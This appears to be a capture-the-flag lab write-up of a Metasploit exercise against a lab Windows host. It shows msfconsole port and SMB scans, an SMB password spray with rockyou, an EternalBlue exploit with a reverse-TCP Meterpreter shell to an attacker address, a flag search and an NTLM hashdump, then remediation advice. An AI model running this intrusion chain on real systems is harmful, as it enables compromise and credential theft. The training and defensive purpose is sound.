Metasploit scan, SMB spray, EternalBlue, and pirate NTLM dump
Foundations offensive tooling engagement: used msfconsole auxiliary scanners for ports/NetBIOS/SMB, cracked penny’s SMB password from rockyou, exploited a critical Windows service to Meterpreter, recovered flag.txt and pirate’s NTLM hash.
- Case files
- Metasploit scan, SMB spray, EternalBlue, and pirate NTLM dump
Five open ports; NetBIOS ACME IT SUPPORT; webfs on 8000; penny:leo1234 via smb_login; EternalBlue Meterpreter; flag THM-5455554845; pirate NTLM recovered.
portscan + smb_version/netbios; smb_login recovered penny:leo1234.
ms17_010_eternalblue → Meterpreter; flag.txt and pirate NTLM recovered.
Engagement summary
Five open ports; NetBIOS ACME IT SUPPORT; webfs on 8000; penny:leo1234 via smb_login; EternalBlue Meterpreter; flag THM-5455554845; pirate NTLM recovered.
METASPLOIT: EXPLOITATION was a controlled lab validating the framework as an engagement accelerator — not a substitute for methodology. From msfconsole we ran portscan modules (five ports open), SMB/NetBIOS auxiliaries (NetBIOS name ACME IT SUPPORT), and service fingerprinting (port 8000 → webfs/1.21). smb_login against user penny with the engagement wordlist recovered leo1234. Vulnerability modules and exploit selection led to a critical Windows SMB path (ms17_010_eternalblue pattern) with windows/x64/meterpreter/reverse_tcp. Post-exploitation search located flag.txt (THM-5455554845); hashdump yielded pirate’s NTLM 8ce9a3ebd1647fcc5e04025019f4b875. SMTP open-relay scanner authorship noted as Campbell Murray for module hygiene tracking. Workspace/database features were used to keep hosts and loot organized across the short engagement window.
Business impact
Unpatched MS17-010-class SMB exposure plus weak SMB passwords is ransomware-grade compromise. Framework-assisted scanning without change control still generates detectable noise — scope ROE and rate limits. Credential reuse (penny) and dumped NTLM enable lateral movement beyond the initial host.
Auxiliary scan and SMB password spray
portscan + smb_version/netbios; smb_login recovered penny:leo1234.
OPERATOR · MSF
savvy@lab:~$ msfconsole -q
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.10; run
5 open ports
msf6 > use auxiliary/scanner/smb/smb_version; set RHOSTS 10.10.10.10; run
NetBIOS: ACME IT SUPPORT · 8000/tcp webfs/1.21
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser penny; set PASS_FILE rockyou.txt; run
penny : leo1234 — SMB login success
Critical exploit to Meterpreter and loot
ms17_010_eternalblue → Meterpreter; flag.txt and pirate NTLM recovered.
OPERATOR · EXPLOIT
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.0.54; set RHOSTS 10.10.10.10; run
Meterpreter session 1 opened
meterpreter > search -f flag.txt
THM-5455554845
meterpreter > hashdump
pirate:...:8ce9a3ebd1647fcc5e04025019f4b875
Remediation
Patch EternalBlue-class SMB flaws; disable SMBv1; enforce strong unique SMB passwords and lockout. Segment legacy Windows; monitor for Metasploit/Meterpreter C2 patterns. Rotate any account whose NTLM left the host.